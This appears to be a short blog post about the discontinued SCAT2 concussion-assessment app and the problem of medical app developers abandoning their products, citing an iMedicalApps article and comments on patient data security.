What happened? There was a modified standard (SCAT3) developed in 2012, which updated SCAT2 with non-critical additions: indications for emergency management, a slightly more extensive background section, a neck exam and more detailed return-to-play instructions. SCAT3 is only available on (inconvenient) paper. No word from Inovapp on why it discontinued the app nor any plans for updating.

The SCAT2 had gained, in a short time, a following among coaches and sports medical professionals because it was the first app based upon the international standard (Zurich, 2008, 3rd International Conference on Concussion in Sport) transferring a paper assessment tool to an easy to use app. In fact, the NHL (National Hockey League) has its own version. The revised 2012 standards  Users have a right to be upset, but moreover, this points to a glaring shortcoming of medical apps–their developers vanishing into the night without a by-your-leave. And read the comments by (mainly) doctors on securing patient information after the app is used (HIPAA standards) and one physician’s criticism of apps such as this as a ‘crutch’.  A Pointer to the Future we don’t want to see. The authors Irfan Husain and Iltifat Husain, MD are to be congratulated. Popular app being used to manage concussions fails, failing patients (iMedicalApps)